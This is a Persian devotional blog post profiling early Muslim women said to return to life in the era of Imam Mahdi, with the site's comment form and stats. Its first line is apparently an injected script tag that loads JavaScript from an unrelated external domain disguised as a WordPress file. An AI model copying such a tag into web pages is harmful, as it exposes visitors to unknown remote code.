script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> زنان سرافراز
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند
شنبه 26 شهريور 1390برچسب:زنان سرافراز,زنان سرافراز,, :: 7:24 ::  نويسنده : زارعی

زنان سرافراز

 

اينك به اختصار به شرح حال برخي زنان نام‌برده مي‌پردازيم.
1. صيانه ماشطه
او يكي از همان سيزده بانويي است كه در دولت حضرت مهدي  (علیه السلام)  زنده شده، به دنيا باز مي‌گردد. وي همسر حزقيل - پسر عموي فرعون- و شغلش آرايشگري دختر فرعون بود. او همانند شوهرش به پيامبر زمان خود - حضرت موسي- ايمان آورده بود، ولي همچنان ايمان خود را پنهان مي‌كرد. نوشته‌اند: روزي وي مشغول آرايش دختر فرعون بود كه شانه از دستش افتاد و بي اختيار نام خدا را بر زبان جاري ساخت. دختر فرعون گفت: آيا نام پدر مرا بر زبان آوردي؟ گفت: نه، بلكه نام كسي را بر زبان آوردم كه پدر تو را آفريده است.

دختر فرعون ماجرا را نزد پدر بازگو كرد و فرعون صيانه را احضار كرد و گفت: مگر به خدايي من اعتراف نداري؟ گفت: هرگز! من از خداي حقيقي دست نمي‌كشم و تو را پرستش نمي‌كنم.

فرعون دستور داد تا تنور مسي برافروزند و همه بچه‌هاي آن زن را در حضورش در آتش افكنند. چون نوبت به طفل شير خوارش رسيد، صيانه مي‌خواست به ظاهر از دين برائت جويد كه كودك شيرخوارش به زبان آمد و گفت: مادر صبر كن كه تو بر حق هستي! فرعونيان آن زن و بچه شيرخوارش را در آتش افكنده، سوزاندند و خداوند در اثر صبر و تحمل آن زن در راه دين، او را در دولت امام مهدي (عجل الله تعالی فرجه الشریف)  زنده مي‌گرداند تا هم به آن حضرت خدمت كند و هم انتقام خود را از فرعونيان بگيرد.
2. سميه، مادر عمار ياسر
وي هفتمين نفري بود كه به اسلام گرويد و بدين سبب، دشمن سخت به خشم آمد و بدترين شكنجه‌ها را بر او روا داشت.
او و شوهرش ياسر در دام ابوجهل گرفتار آمدند و او نخست آن‌ها را وادار كرد كه به پيامبر خدا دشنام دهند، آن‌ها به چنين كاري راضي نشدند. او نيز زره آهني به سميه و ياسر پوشانيد و آن‌ها را در آفتاب سوزان نگه داشت. پيامبر كه گاه از كنارشان عبور مي‌كرد، آن‌ها با به صبر و مقاومت سفارش مي‌كرد و مي‌فرمود: «صبراً يا آل ياسر فان موعدكم الجنة؛ ‌اي خاندان ياسر، صبر پيشه سازيد كه وعده گاه شما بهشت است.» سرانجام ابو جهل بر هر يك ضربتي وارد كرد و ايشان را به شهادت رساند.
خداوند اين زن را به پاداش صبر و مجاهدتي كه در راه اعتلاي اسلام نشان داد و بدترين شكنجه را از دشمن خدا تحمل نمود، در ايام ظهور مهدي آل محمد (علیه السلام)  زنده خواهد خواهد تا تحقق وعده الهي را ببيند و در لشكر ولي خدا به ياوران آن حضرت خدمت كند.
3. نسيبه، دختر كعب مازنيه
او معروف به «ام عماره» و از زنان فداكار صدر اسلام است كه در برخي جنگ‌هاي پيامبر اسلام  (علیه السلام)  شركت جسته و مجروحان جنگي را مداوا كرده است. او در جنگ احد بهترين نقش را ايفا كرد. با ديدن صحنه فرار مسلمانان و تنها گذاشتن پيامبر (صل الله علیه و آله و سلم)  به دفاع از جان شريف آن حضرت پرداخت و در اين راه بدنش زخمهايي فراوان برداشت.
پيامبر عزيز اين فداكاري را ستوده و به فرزندش عماره چنين فرمود: امروزه مقام مادر تو از مردان جنگي والاتر است. 
پس از فروكش كردن جنگ، نسيبه با سيزده زخم   سنگين به همراه ديگر مسلمانان به خانه بازگشت و به استراحت پرداخت. با شنيدن فرمان پيامبر خدا (صل الله علیه و آله و سلم)  كه فقط مجروحان جنگ بايد به تعقيب دشمن بشتابند، نسيبه از جاي برخاست و آماده رفتن شد، ولي به دليل شدت خونريزي نتوانست شركت كند. همين كه پيامبر از تعقيب دشمن بازگشت، پيش از آن‌كه به خانه برود، عبدالله بن كعب مازني را براي احوال‌پرسي نسيبه و سلامتي وي به نزد او فرستاد و چون از سلامتي وي آگاه شد، شادمان موضوع را به پيامبر خبر داد.

نسيبه از كساني است كه براي ياري امام مهدي  (علیه السلام)  زنده خواهد شد.

4. امّ ايمن
از زنان پرهيزگار و خدمتكار حضرت رسول‌ است. پيامبر به او «مادر» خطاب مي‌كرد و مي‌فرمود: «هذه بقية اهل بيتي؛  اين زن، باقي مانده‌اي از خاندان من است.» وي همواره در كنار زنان مجاهد، درجبهه جنگ به مداواي مجروحان مي‌پرداخت.
ام ايمن از شيفتگان خاندان امامت بود و در ماجراي فدك، حضرت زهرا  (علیه السلام)  او را به عنوان شاهد معرفي كرد. وي پنج يا شش ماه پس از پيامبر از دنيا رفت.
خداوند به بركت مهدي آل محمد (علیه السلام)  به هنگام ظهور، او را زنده مي‌گرداند تا در لشكرگاه امام به خدمت گماشته شود.
5. امّ خالد
در روايات، دو بانو بدين نام مشهور شده‌اند: ام خالد احمسيه و ام خالد جهنّيه.شايد مقصود ام خالد مقطوعة اليد (=دست بريده) باشد كه يوسف بن عمر، پس از به شهادت رساندن زيد بن علي بن الحسين در كوفه، دست او را به جرم شيعه بودن قطع كرد. در كتاب رجال كشّي درباره شخصيت و مقام اين زن فداكار از امام صادق  (علیه السلام) مطلبي ذكر گرديده كه داراي اهميت است. ابو بصير گويد: در خدمت امام صادق (علیه السلام)  نشسته بوديم كه ام خالد مقطوعه اليد از راه رسيد. حضرت فرمود:‌ اي ابابصير، آيا ميل داري سخن ام خالد را بشنوي؟ من عرض كردم: آري‌ اي فرزند رسول خدا، با شنيدن آن شادمان مي‌گردم... در همان موقع ام خالد به خدمت امام آمد و سخن گفت. ديدم وي در كمال فصاحت و بلاغت سخن مي‌گويد؛ سپس حضرت دربارة موضوع ولايت و برائت از دشمنان با او گفتگو كرد.
6. زبيده
مشخصات كاملي از او نقل نشده است و احتمال دارد زبيده زن هارون الرشيد باشد كه شيخ صدوق (ره) درباره اش گفته است: وي يكي از هواداران و پيروان اهل بيت است. هنگامي كه هارون دانست از شيعيان است، قسم خورد طلاقش دهد. زبيده كارهاي خدماتي بسياري داشت كه يكي آبرساني به عرفات است. همچنين نوشته‌اند وي يكصد كنيز داشت كه پيوسته مشغول حفظ قرآن بودند و هميشه از محل سكونت او صداي تلاوت قرآن شنيده شد. زبيده در سال216 ق رحلت كرد.
7. حبّابه والبيه
از زنان والامقامي است كه دوره زندگي هشت امام معصوم را درك كرد و پيوسته مورد لطف و عنايت ايشان قرار داشت. در يك يا دو نوبت به وسيله امام زين العابدين و امام رضا  (علیه السلام)  جواني‌اش به او بازگردانده شد. اولين ملاقات وي با امير مؤمنان (علیه السلام) بود كه از آن حضرت دليلي بر امامت درخواست كرد. حضرت در حضور وي سنگي را برداشت و بر آن مهر خود را نقش كرد و اثر آن مهر در سنگ جاي گرفت و به او فرمود: پس از من هر كه توانست در اين سنگ چنين اثري بر جاي بگذارد، او امام است؛ از اين‌رو، حبابه پس از شهادت هر امامي نزد امام ديگر مي‌رفت و آنان مهر خود را بر همان سنگ مي‌زدند و اثر آن نقش مي‌بست. نوبت كه به امام رضا (علیه السلام) رسيد حضرت نيز چنين كرد. حبابه نه ماه  پس از رحلت امام رضا (علیه السلام) زنده بود و پس از آن بدرود حيات گفت.
روايت شده است كه وقتي حبابه به خدمت امام زين ‌العابدين (علیه السلام) رسيد، يكصد و سيزده سال از عمرش سپري شده بود. حضرت با انگشت سبابه خود اشاره‌اي نمود و جواني‌اش بازگشت.
همچنين نوشته‌اند: صورت حبابه از زيادي سجود سوخته و از عبادت همانند چوب خشكيده‌اي شده بود.
8. قنواء
دختر رشيد هجري، يكي از شيعيان و پيروان علي (علیه السلام) و خود از ياران با وفاي حضرت امام جعفر صادق (علیه السلام) است . وي دختر بزرگمردي است كه در راه محبت و دوستي امير مؤمنان به طرز دلخراشي به شهادت رسيد. از گفتار شيخ  مفيد بر مي‌آيد كه قنواء به هنگام  ورود پدرش نزد عبيد الله بن زياد شاهد قطع دو دست و دو پاي پدر خود بوده و به كمك ديگران بدن نيمه جان پدر را از دار الاماره بيرون آورده و به خانه منتقل كرده است. روزي قنواء به پدرش گفت: پدر جان، چرا اين همه خود را به رنج و مشقت عبادت مي‌اندازي؟ پدر در پاسخ گفت: دخترم،پس از ما گروهي خواهند آمد كه بينش ديني و شدت ايمانشان از ما، كه اين همه خود را به زحمت عبادت انداخته‌ايم، بيشتر است.
د: بانوان منتظِر
چهارمين گروه ياوران امام زمان (عجل الله تعالی فرجه الشریف)  بانوان پرهيزكاري هستند كه پيش از ظهور آن حضرت رحلت كرده‌اند. به ايشان گفته مي‌شود امام تو ظاهر گشته است، اگر مايلي مي‌تواني حضور داشته باشي. آنان نيز به اراده  پروردگار زنده خواهند شد.
رجعت زنان، مربوط به گروه خاصي نيست و هر بانويي كه خود را با خواسته‌ها و شرايط زندگي در حكومت مهدي آل محمد  (علیه السلام)  تطبيق دهد، ممكن است در آينده از رحمت خداوندي بهره‌مند گشته، براي ياري امام زنده شود. يكي از آن شرايط، خواندن دعاي عهد است كه در فرد، نوعي آمادگي براي پذيرش حكومت آخرين ذخيره الهي ايجاد مي‌كند. به فرموده امام صادق‌ (علیه السلام) : هر كس چهل صبح دعاي عهد را بخواند، از ياوران قائم ما باشد و اگر پيش از ظهور آن حضرت از دنيا برود، خداوند او را از قبر بيرون آورد تا در خدمت آن حضرت باشد...

نوشته محمد جواد طبسی


نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:





درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 3
بازدید دیروز : 4
بازدید هفته : 3
بازدید ماه : 255
بازدید کل : 33024
تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1